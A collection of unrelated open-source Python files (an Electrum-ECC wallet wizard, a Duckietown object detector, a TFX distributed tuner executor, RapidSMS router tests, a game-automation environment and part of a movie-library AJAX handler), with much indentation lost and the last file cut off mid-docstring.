vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-ECC communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
static_object_detector_node.py
|
#!/usr/bin/env python
import cv2
import numpy as np
import rospy
from sensor_msgs.msg import Image
from std_msgs.msg import Float32
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import ObstacleImageDetection, ObstacleImageDetectionList, ObstacleType, Rect, BoolStamped
import sys
import threading
from rgb_led import *
class Matcher:
CONE = [np.array(x, np.uint8) for x in [[0,80,80], [22, 255,255]] ]
DUCK = [np.array(x, np.uint8) for x in [[25,100,150], [35, 255, 255]] ]
terms = {ObstacleType.CONE :"cone", ObstacleType.DUCKIE:"duck"}
def __init__(self):
self.cone_color_low = self.setupParam("~cone_low", [0,80,80])
self.cone_color_high = self.setupParam("~cone_high", [22, 255,255])
self.duckie_color_low = self.setupParam("~duckie_low", [25, 100, 150])
self.duckie_color_high = self.setupParam("~duckie_high", [35, 255,255])
self.CONE = [np.array(x, np.uint8) for x in [self.cone_color_low, self.cone_color_high] ]
self.DUCK = [np.array(x, np.uint8) for x in [self.duckie_color_low, self.duckie_color_high] ]
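        # Bounds are OpenCV HSV (hue in 0..179): roughly orange for cones and
        # yellow for duckies.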
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name,default_value)
        rospy.set_param(param_name,value) #Write to parameter server for transparency
rospy.loginfo("[%s] %s = %s " %('static_object_detector_node',param_name,value))
return value
def get_filtered_contours(self,img, contour_type):
hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
if contour_type == "CONE":
frame_threshed = cv2.inRange(hsv_img, self.CONE[0], self.CONE[1])
ret,thresh = cv2.threshold(frame_threshed,22,255,0)
elif contour_type == "DUCK_COLOR":
frame_threshed = cv2.inRange(hsv_img, self.DUCK[0], self.DUCK[1])
ret,thresh = cv2.threshold(frame_threshed,30,255,0)
elif contour_type == "DUCK_CANNY":
frame_threshed = cv2.inRange(hsv_img, self.DUCK[0], self.DUCK[1])
frame_threshed = cv2.adaptiveThreshold(frame_threshed,255,\
cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,5,2)
thresh = cv2.Canny(frame_threshed, 100,200)
else:
return
filtered_contours = []
_, contours, hierarchy = cv2.findContours(\
thresh,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)
contour_area = [ (cv2.contourArea(c), (c) ) for c in contours]
contour_area = sorted(contour_area,reverse=True, key=lambda x: x[0])
height,width = img.shape[:2]
for (area,(cnt)) in contour_area:
# plot box around contour
x,y,w,h = cv2.boundingRect(cnt)
box = (x,y,w,h)
d = 0.5*(x-width/2)**2 + (y-height)**2
if not(h>15 and w >10 and h<200 and w<200 and d < 120000):
continue
if contour_type == "DUCK_CANNY":
continue
if contour_type =="DUCK_COLOR": # extra filtering to remove lines
if not(h>25 and w>25):
continue
if d>90000:
if not(h>35 and w>35):
continue
if cv2.contourArea(cnt)==0:
continue
val = cv2.arcLength(cnt,True)**2/ cv2.contourArea(cnt)
if val > 35: continue
rect = cv2.minAreaRect(cnt)
ctr, sides, deg = rect
val = 0.5*cv2.arcLength(cnt,True) / (w**2+h**2)**0.5
if val < 1.12: continue
#if area > 1000: continue
mask = np.zeros(thresh.shape,np.uint8)
cv2.drawContours(mask,[cnt],0,255,-1)
mean_val = cv2.mean(img,mask = mask)
aspect_ratio = float(w)/h
filtered_contours.append( (cnt, box, d, aspect_ratio, mean_val) )
return filtered_contours
def contour_match(self, img):
'''
Returns 1. Image with bounding boxes added
2. an ObstacleImageDetectionList
'''
object_list = ObstacleImageDetectionList()
object_list.list = []
height,width = img.shape[:2]
object_list.imwidth = width
object_list.imheight = height
# get filtered contours
cone_contours = self.get_filtered_contours(img, "CONE")
duck_contours = self.get_filtered_contours(img, "DUCK_COLOR")
all_contours = [duck_contours, cone_contours]
for i, contours in enumerate(all_contours):
for (cnt, box, ds, aspect_ratio, mean_color) in contours:
# plot box around contour
x,y,w,h = box
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,self.terms[i], (x,y), font, 0.5,mean_color,4)
cv2.rectangle(img,(x,y),(x+w,y+h), mean_color,2)
r = Rect()
r.x = x
r.y = y
r.w = w
r.h = h
t = ObstacleType()
t.type = i
d = ObstacleImageDetection()
d.bounding_box = r
d.type = t
                object_list.list.append(d)
return img, object_list
class StaticObjectDetectorNode:
def __init__(self):
self.name = 'static_object_detector_node'
self.tm = Matcher()
self.active = True
self.thread_lock = threading.Lock()
self.sub_image = rospy.Subscriber("~image_raw", Image, self.cbImage, queue_size=1)
self.sub_switch = rospy.Subscriber("~switch",BoolStamped, self.cbSwitch, queue_size=1)
self.pub_image = rospy.Publisher("~cone_detection_image", Image, queue_size=1)
self.pub_detections_list = rospy.Publisher("~detection_list", ObstacleImageDetectionList, queue_size=1)
self.bridge = CvBridge()
turn_off_LEDs(speed=5)
rospy.loginfo("[%s] Initialized." %(self.name))
def cbSwitch(self,switch_msg):
self.active = switch_msg.data
def cbImage(self,image_msg):
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
        thread.daemon = True
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
return
        try:
            image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
        except CvBridgeError as e:
            print(e)
            self.thread_lock.release()
            return
img, detections = self.tm.contour_match(image_cv)
detections.header.stamp = image_msg.header.stamp
detections.header.frame_id = image_msg.header.frame_id
self.pub_detections_list.publish(detections)
height,width = img.shape[:2]
try:
self.pub_image.publish(self.bridge.cv2_to_imgmsg(img, "bgr8"))
except CvBridgeError as e:
print(e)
self.thread_lock.release()
if __name__=="__main__":
rospy.init_node('static_object_detector_node')
node = StaticObjectDetectorNode()
rospy.spin()
|
executor.py
|
# Lint as: python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper class to start TFX Tuner as a Job on Google Cloud AI Platform."""
import datetime
import json
import multiprocessing
import os
from typing import Any, Dict, List, Text
from absl import logging
from tfx import types
from tfx.components.base import base_executor
from tfx.components.trainer import constants
from tfx.components.tuner import executor as tuner_executor
from tfx.extensions.google_cloud_ai_platform import runner
from tfx.extensions.google_cloud_ai_platform.trainer import executor as ai_platform_trainer_executor
from tfx.utils import json_utils
# Directory to store intermediate hyperparameter search progress.
# TODO(b/160188053): Use the same temp dir as the calling Executor.
_WORKING_DIRECTORY = '/tmp'
class Executor(base_executor.BaseExecutor):
"""Tuner executor that launches parallel tuning flock on Cloud AI Platform.
This executor starts a Cloud AI Platform (CAIP) Training job with a flock of
workers, where each worker independently executes Tuner's search loop on
the single machine.
  Per KerasTuner's design, each distributed Tuner's identity is controlled by
  an environment variable (KERASTUNER_TUNER_ID) that is configured on every
  worker of the CAIP training job's worker flock.
  In addition, some implementations of KerasTuner require a separate process
  that centrally manages the state of tuning (the so-called 'chief oracle'),
  which all workers consult via another pair of environment variables
  (KERASTUNER_ORACLE_IP and KERASTUNER_ORACLE_PORT).
  In summary, the distributed tuning flock on a Cloud AI Platform job is
  structured as follows.
Executor.Do() -> launch _Executor.Do() on a possibly multi-worker CAIP job ->
-+> master -> _search() (-> create a subprocess -> run the chief oracle.)
| +> trigger a single tuner.search()
+> worker -> _search() -> trigger a single tuner.search()
+> worker -> _search() -> trigger a single tuner.search()
"""
# TODO(b/160013376): Refactor common parts with Trainer Executor.
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Starts a Tuner component as a job on Google Cloud AI Platform."""
self._log_startup(input_dict, output_dict, exec_properties)
custom_config = json_utils.loads(
exec_properties.get(constants.CUSTOM_CONFIG_KEY, 'null'))
if custom_config is None:
raise ValueError('custom_config is not provided')
if not isinstance(custom_config, Dict):
raise TypeError('custom_config in execution properties must be a dict, '
'but received %s' % type(custom_config))
training_inputs = custom_config.get(
ai_platform_trainer_executor.TRAINING_ARGS_KEY)
if training_inputs is None:
err_msg = ('\'%s\' not found in custom_config.' %
ai_platform_trainer_executor.TRAINING_ARGS_KEY)
logging.error(err_msg)
raise ValueError(err_msg)
tune_args = tuner_executor.get_tune_args(exec_properties)
num_parallel_trials = (1
if not tune_args else tune_args.num_parallel_trials)
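    # e.g. num_parallel_trials=3 -> the chief/master runs one search loop
    # itself and 2 additional workers are provisioned below.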
if num_parallel_trials > 1:
# Chief node is also responsible for conducting tuning loop.
desired_worker_count = num_parallel_trials - 1
if training_inputs.get('workerCount') != desired_worker_count:
logging.warning('workerCount is overridden with %s',
desired_worker_count)
training_inputs['workerCount'] = desired_worker_count
training_inputs['scaleTier'] = 'CUSTOM'
training_inputs['masterType'] = (
training_inputs.get('masterType') or 'standard')
training_inputs['workerType'] = (
training_inputs.get('workerType') or 'standard')
# 'tfx_tuner_YYYYmmddHHMMSS' is the default job ID if not specified.
job_id = (
custom_config.get(ai_platform_trainer_executor.JOB_ID_KEY) or
'tfx_tuner_{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S')))
# TODO(b/160059039): Factor out label creation to a utility function.
executor_class = _WorkerExecutor
executor_class_path = '%s.%s' % (executor_class.__module__,
executor_class.__name__)
# Note: exec_properties['custom_config'] here is a dict.
return runner.start_aip_training(input_dict, output_dict, exec_properties,
executor_class_path, training_inputs,
job_id)
def _need_chief_oracle(exec_properties: Dict[Text, Any]) -> bool:
"""Returns True if the Tuner instance requires a chief oracle."""
# TODO(b/160902662): Skip chief oracle for CloudTuner that does not require
# chief oracle for distributed tuning (it is a no-op,
# because it simply forwards to the AI Platform Optimizer
# service).
del exec_properties
return True
class _WorkerExecutor(base_executor.BaseExecutor):
"""TFX Tuner executor impl as a worker in a Google Cloud AI Platform job."""
  def _start_chief_oracle_in_subprocess(
      self, input_dict: Dict[Text, List[types.Artifact]],
      exec_properties: Dict[Text, Any]):
"""Starts a chief oracle in a subprocess."""
def _run_chief_oracle() -> None:
"""Invoke chief oracle, and listen to the open port."""
logging.info('chief_oracle() starting...')
# Per KerasTuner's specification, configuration of chief oracle is set
# by environment variables. This only affects the current sub-process
# which is single-threaded, but not the main process. As such, mutation
# of this otherwise global state is safe.
os.environ['KERASTUNER_ORACLE_IP'] = '0.0.0.0'
os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port
os.environ['KERASTUNER_TUNER_ID'] = 'chief'
logging.info('Binding chief oracle server at: %s:%s',
os.environ['KERASTUNER_ORACLE_IP'],
os.environ['KERASTUNER_ORACLE_PORT'])
# By design of KerasTuner, chief oracle blocks forever. Ref.
# https://github.com/keras-team/keras-tuner/blob/e8b0ad3ecae471c73e17cb41f37e6f99202ac0dd/kerastuner/engine/base_tuner.py#L74-L76
tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY)
    # Because KerasTuner's interface controls behavior through environment
    # variables, the chief oracle is started in a sub-process, rather than in
    # another thread of the main process, so that those environment variables
    # do not leak into the main process.
result = multiprocessing.Process(target=_run_chief_oracle)
result.start()
logging.info('Chief oracle started at PID: %s', result.pid)
return result
def _search(self, input_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, List[types.Artifact]]):
"""Conducts a single search loop, setting up chief oracle if necessary."""
# If not distributed, simply conduct search and return.
if self._tuner_id is None:
return tuner_executor.search(input_dict, exec_properties,
_WORKING_DIRECTORY)
if _need_chief_oracle(exec_properties):
# If distributed search, and this node is chief, start a chief oracle
# process before conducting search by itself.
if self._is_chief:
# Tuner with chief oracle will block forever. As such, start it in
# a subprocess and manage its lifecycle by the main process.
# Note that the Tuner with chief oracle does not run search loop,
# hence does not run TensorFlow code in the subprocess.
self._chief_process = self._start_chief_oracle_in_subprocess(
input_dict, exec_properties)
# If distributed, both master and worker need to know where the oracle is.
# Per KerasTuner's interface, it is configured through env variables.
# This only affects the current main process, which is designed to be
# single-threaded. As such, mutation of this otherwise global state is
# safe.
os.environ['KERASTUNER_ORACLE_IP'] = self._master_addr
os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port
logging.info('Oracle chief is known to be at: %s:%s',
os.environ['KERASTUNER_ORACLE_IP'],
os.environ['KERASTUNER_ORACLE_PORT'])
# Conduct tuner search loop, regardless of master or worker.
# There is only one Tuner instance in the current process, as such,
    # controlling the id of the Tuner instance via environment variable
# is safe.
os.environ['KERASTUNER_TUNER_ID'] = self._tuner_id
logging.info('Setting KERASTUNER_TUNER_ID with %s',
os.environ['KERASTUNER_TUNER_ID'])
return tuner_executor.search(input_dict, exec_properties,
_WORKING_DIRECTORY)
def __init__(self, context):
super(_WorkerExecutor, self).__init__(context)
    # These fields are populated only when running in distributed mode.
self._is_chief = False
self._tuner_id = None
self._master_addr = None
self._master_port = None
self._chief_process = None # Populated when the chief oracle is started.
# Initialize configuration of distribution according to CLUSTER_SPEC
logging.info('Initializing cluster spec... ')
cluster_spec = json.loads(os.environ.get('CLUSTER_SPEC', '{}'))
# If CLUSTER_SPEC is not present, assume single-machine tuning.
if not cluster_spec:
return
self._master_addr, self._master_port = (
# We rely on Cloud AI Platform Training service's specification whereby
# there will be no more than one master replica.
# https://cloud.google.com/ai-platform/training/docs/distributed-training-containers#cluster-spec-format
cluster_spec['cluster']['master'][0].split(':'))
self._tuner_id = (
'tfx-tuner-%s-%d' % (
cluster_spec['task']['type'], # 'master' or 'worker'
cluster_spec['task']['index'] # zero-based index
))
logging.info('Tuner ID is: %s', self._tuner_id)
self._is_chief = cluster_spec['task']['type'] == 'master'
    logging.info('Cluster spec initialized with: %s', cluster_spec)
def __del__(self):
self._close()
def _close(self) -> None:
"""Kills the chief oracle sub-process, if still running."""
if self._chief_process and self._chief_process.is_alive():
logging.info('Terminating chief oracle at PID: %s',
self._chief_process.pid)
self._chief_process.terminate()
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
tuner = self._search(input_dict, exec_properties)
if self._tuner_id is not None and not self._is_chief:
logging.info('Returning since this is not chief worker.')
return
tuner_executor.write_best_hyperparameters(tuner, output_dict)
self._close()
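# Illustrative sketch (not part of the executor above; all values are
# hypothetical): Cloud AI Platform Training publishes the cluster layout in
# the CLUSTER_SPEC environment variable as JSON, and _WorkerExecutor derives
# its tuner id and chief role from the 'task' entry, e.g.:
#
#   {'cluster': {'master': ['10.0.0.2:2222'],
#                'worker': ['10.0.0.3:2222', '10.0.0.4:2222']},
#    'task': {'type': 'worker', 'index': 0}}
#
#   -> tuner_id == 'tfx-tuner-worker-0', is_chief == False,
#      master_addr == '10.0.0.2', master_port == '2222'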
|
decorators.py
|
import threading
def start_thread(func):
    """Run the decorated callable in a daemon thread and return the Thread."""
    def wrapped(*args, **kwargs):
        thread = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
        thread.start()
        return thread
    return wrapped
def standart_position_output(func):
    """Normalize a raw position output into a reference-frame dict.
    Wraps a method whose output is {'position': [x, y, z, roll, pitch, yaw], ...}
    and returns {'point': ..., 'rotation': ..., 'timestamp': ...}; the
    'timestamp' key is omitted when the wrapped output has none.
    """
    def wrapped(self):
        output = func(self)  # call the wrapped method once, not once per field
        point = dict(zip(['x', 'y', 'z'], output['position'][:3]))
        rotation = dict(zip(['roll', 'pitch', 'yaw'], output['position'][3:]))
        try:
            return {'point': point, 'rotation': rotation,
                    'timestamp': output['timestamp']}
        except KeyError:
            return {'point': point, 'rotation': rotation}
    return wrapped
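# Usage sketch (the Robot class and its return values below are hypothetical,
# not part of this module):
#
#   class Robot:
#       @start_thread
#       def poll(self):
#           ...  # runs in a daemon thread; the Thread object is returned
#
#       @standart_position_output
#       def position(self):
#           return {'position': [0.1, 0.2, 0.3, 0.0, 0.0, 1.57],
#                   'timestamp': 1234567890.0}
#
#   Robot().position()
#   # -> {'point': {'x': 0.1, 'y': 0.2, 'z': 0.3},
#   #     'rotation': {'roll': 0.0, 'pitch': 0.0, 'yaw': 1.57},
#   #     'timestamp': 1234567890.0}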
|
generate_LR_noise.py
|
import os
import numpy as np
import cv2
import sys
from multiprocessing import Process
kIMG_FILES = ['png', 'jpeg', 'jpg', 'bmp', 'tiff']
def genNoise(sigma, input_fld):
output_fld = os.path.join(sys.argv[3], 'n_{}'.format(sigma))
os.makedirs(output_fld, exist_ok=True)
imgs_path_list = [x for x in os.listdir(input_fld) if x.split('.')[-1].lower() in kIMG_FILES]
imgs_path_list.sort()
for img_p in imgs_path_list:
print('\rSigma:{}, Img:{}'.format(sigma, img_p), end='')
img = cv2.imread(os.path.join(input_fld, img_p)) / 255
h, w, c = img.shape
noise_kernel = np.random.normal(0, sigma / 255, (h, w, c))
n_img = img + noise_kernel
n_img[n_img > 1] = 1
n_img[n_img < 0] = 0
n_img = (n_img * 255).astype(np.uint8)
cv2.imwrite(os.path.join(output_fld, img_p), n_img)
print()
def main():
sigmas = [int(x) for x in sys.argv[1].split(',')]
input_fld = sys.argv[2]
all_proc = []
for sigma in sigmas:
all_proc.append(Process(target=genNoise,args=(sigma, input_fld)))
all_proc[-1].start()
for p in all_proc:
p.join()
print("Done")
if __name__ == '__main__':
    if len(sys.argv) < 4:  # needs sigma levels, input folder and output folder
        print("Usage: generate_LR_noise.py [sigma levels (csv)] [input folder] [output folder]")
        sys.exit(1)
main()
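# Example invocation (paths and sigma levels are hypothetical); each sigma
# level runs in its own process and writes to <output folder>/n_<sigma>:
#
#   python generate_LR_noise.py 15,25,50 ./images/HR ./images/LR
#   # -> ./images/LR/n_15, ./images/LR/n_25, ./images/LR/n_50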
|
test_router.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
def test_router_finds_apps():
router = Router()
router.add_app("rapidsms.contrib.default")
from rapidsms.contrib.default.app import App
assert_equals(len(router.apps), 1)
app = router.get_app("rapidsms.contrib.default")
assert_equals(type(app), App)
def test_router_returns_none_on_invalid_apps():
assert_equals(Router().get_app("not.a.valid.app"), None)
def test_router_raises_on_uninstalled_apps():
assert_raises(KeyError, Router().get_app, "rapidsms.contrib.default")
def test_router_starts_and_stops_apps_and_backends():
class MockApp(AppBase):
def start(self):
self.started = True
def stop(self):
self.stopped = True
class MockBackend(BackendBase):
def start(self):
self.started = True
BackendBase.start(self)
def stop(self):
self.stopped = True
BackendBase.stop(self)
router = Router()
app = MockApp(router)
router.apps.append(app)
backend = MockBackend(router, "mock")
router.backends["mock"] = backend
    assert not hasattr(app, 'started')
    assert not hasattr(app, 'stopped')
    assert not hasattr(backend, 'started')
    assert not hasattr(backend, 'stopped')
# start in a separate thread, so we can test it asynchronously.
worker = threading.Thread(target=router.start)
worker.daemon = True
worker.start()
# wait until the router has started.
while not router.running:
time.sleep(0.1)
assert_equals(app.started, True)
assert_equals(backend.started, True)
    assert not hasattr(app, 'stopped')
    assert not hasattr(backend, 'stopped')
    # stop the router and wait until it has shut down.
router.stop()
worker.join()
assert_equals(app.started, True)
assert_equals(app.stopped, True)
assert_equals(backend.started, True)
assert_equals(backend.stopped, True)
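# These tests are written for the nose runner (see the nose.tools imports),
# so they can be run with, e.g.:
#
#   nosetests test_router.py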
|
DownGame.py
|
import pdb
import mss
import time
import numpy as np
from time import sleep
from torchvision import transforms
import os
import cv2
import subprocess
from xvfbwrapper import Xvfb
from pynput.keyboard import Controller, Key
from multiprocessing import Pipe, Process
from transitions import Machine, State
from .DownConst import ACTIONS, TOP, LEFT, HEIGHT, WIDTH, LOSE_COLOR, LOSE_LOCATION, PLAYER_COLOR, PLAYFORM_COLOR, PIKE_COLOR, N_PLATFORMS
def down_client(conn):
monitor = {"top": TOP, "left": LEFT, "width": WIDTH, "height": HEIGHT}
def press_and_release(keyboard, keys, holdtime=0.1):
for key in keys:
keyboard.press(key)
time.sleep(holdtime)
for key in keys:
keyboard.release(key)
def start_wine():
subprocess.Popen([r"wine", r"down.exe"])
time.sleep(4)
echo_arg = os.environ['DISPLAY']
echo = subprocess.run(
["echo", echo_arg],
stdout=subprocess.PIPE,
check=True,
)
display_id = echo.stdout[1:-1]
print(int(display_id))
xdp = subprocess.run(
["xdotool", "search", "--name", "NS-SHAFT"],
stdout=subprocess.PIPE,
check=True,
)
        window_id = xdp.stdout.strip()  # drop the trailing newline from xdotool output
# adjust window position
cmd = ["xdotool", "windowmove", window_id, "0", "0"]
subprocess.run(cmd, check=True)
def start_game(keyboard, sct):
img = np.array(sct.grab(monitor))
conn.send(img)
    with Xvfb(width=WIDTH, height=HEIGHT):
# create instance in current desktop
keyboard = Controller()
sct = mss.mss()
# initialize game
start_wine()
start_game(keyboard, sct)
# wait actions
while True:
press_flow = conn.recv()
if press_flow != "UPDATE":
for keys in press_flow:
press_and_release(keyboard, keys=keys)
img = np.array(sct.grab(monitor))
conn.send(img)
class DownGame(object):
def _spawn_down(self):
parent_conn, child_conn = Pipe()
p = Process(target=down_client, args=(child_conn,))
p.start()
return parent_conn, parent_conn.recv()
def __init__(self):
self.actions = ACTIONS
self.parent_conn, self.screenshot = self._spawn_down()
self.FSM = self._init_FSM()
# print(self.FSM.is_gaming())
print("-- client ready")
def take_action(self, idx):
action = self.actions[idx]
# print(self.FSM.state, action)
self.parent_conn.send([action])
self.screenshot = self.parent_conn.recv()
def toggle_start(self):
sleep(0.1)
self.parent_conn.send([("s",)])
self.screenshot = self.parent_conn.recv()
while True:
self.parent_conn.send([("s",)])
self.screenshot = self.parent_conn.recv()
if not (self.screenshot[LOSE_LOCATION[0]][LOSE_LOCATION[1]] == LOSE_COLOR).all():
break
sleep(0.01)
self.FSM.play()
def observe(self):
done = False
if (self.screenshot[LOSE_LOCATION[0]][LOSE_LOCATION[1]] == LOSE_COLOR).all() and self.FSM.is_gaming():
self.FSM.wait()
done = True
return np.zeros(N_PLATFORMS*3+2), -10, done
        player = np.where(self.screenshot == PLAYER_COLOR)
        pikes = np.where(self.screenshot == PIKE_COLOR)
        platforms = np.where(self.screenshot == PLAYFORM_COLOR)
        items = list()
        # 0 is empty, 1 is pikes, 2 is platforms
        for i in range(len(pikes[0])):
            items.append((pikes[0][i], pikes[1][i], 1))
        for i in range(len(platforms[0])):
            items.append((platforms[0][i], platforms[1][i], 2))
if len(player[0]) > 0:
self.player_pos = player[0][0], player[1][0]
items.sort()
items += [[0,0,0]] * N_PLATFORMS
items = items[:N_PLATFORMS]
items = np.asarray(items)
result = np.asarray([self.player_pos[0], self.player_pos[1]])
items = items.reshape(-1)
result = np.concatenate((result, items)).astype("float32")
img = cv2.cvtColor(self.screenshot, cv2.COLOR_RGB2GRAY)
img = transforms.ToTensor()(img).float()
return result, 1 + self.player_pos[0] / 100, done
    def _update_screenshot(self):
        # "UPDATE" tells down_client to refresh the screenshot without
        # pressing any keys; any other payload is treated as key presses.
        self.parent_conn.send("UPDATE")
        self.screenshot = self.parent_conn.recv()
def _init_FSM(self):
states = [
State(name='waiting', on_enter=[], on_exit=[]),
State(name='gaming', on_enter=[], on_exit=[]),
]
transitions = [
{'trigger': 'wait', 'source': 'gaming', 'dest': 'waiting'},
{'trigger': 'play', 'source': 'waiting', 'dest': 'gaming'},
]
return DownGameState(states, transitions, 'waiting')
class DownGameState(object):
def __init__(self, states, transitions, initial_state):
self.machine = Machine(model=self,
states=states,
transitions=transitions,
initial=initial_state)
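# Minimal driver sketch (assumes wine, down.exe, xdotool and an X display are
# available; action index 0 is an arbitrary choice into ACTIONS):
#
#   game = DownGame()
#   game.toggle_start()
#   done = False
#   while not done:
#       game.take_action(0)
#       state, reward, done = game.observe()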
|
ajax.py
|
import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, notification, plugins, downloaders
from core.library import Metadata, Manage
from core.movieinfo import TheMovieDatabase, YouTube
from core.providers import torrent, newznab
from core.helpers import Conversions
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0, status=None, category=None):
        ''' Gets a slice of movies from the library
            sort_key (str): column name to sort by
            sort_direction (str): direction to sort [ASC, DESC]
            limit: int number of movies to get <optional - default 50>
            offset: int list index position to start slice <optional - default 0>
            status (list): filter movies with these statuses only <optional>
            category (str): filter movies with this category only <optional>
        Gets a slice of movies, of length limit, from the library sorted by sort_key
        Returns list of dicts of movies
        '''
if status and not isinstance(status, list):
status = [status]
if status and 'Finished' in status:
status.append('Disabled')
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, status, category)
@cherrypy.expose
@cherrypy.tools.json_out()
def library_counters(self, category=None):
        ''' Get movie counters grouped by status, filtered by category
category (str): Count movies with this category <optional>
'''
status_count = core.sql.get_library_count('status', 'category', category)
status_count['Finished'] = status_count.get('Finished', 0) + status_count.get('Disabled', 0)
if 'Disabled' in status_count:
del status_count['Disabled']
return status_count
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns list of dicts that contain tmdb's data.
'''
results = TheMovieDatabase.search(search_term)
if results:
Manage.add_status_to_search_movies(results)
else:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def tmdb_categories(self, cat, tmdbid=None):
''' Get categories of movies from TMDB
Returns list of dicts of movies
'''
results = TheMovieDatabase.get_category(cat, tmdbid)[:8]
if results:
Manage.add_status_to_search_movies(results)
else:
logging.info('No Results found for {}'.format(cat))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def quick_titles(self):
return core.sql.quick_titles()
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality, rejected=True)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
ne = Conversions.human_datetime(ne) if ne else '[Disabled]'
return {'response': False, 'next': ne}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return YouTube.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
response = Manage.add_movie(movie, full_metadata=False)
if response['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
threading.Thread(target=searcher._t_search_grab, args=(movie,)).start()
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
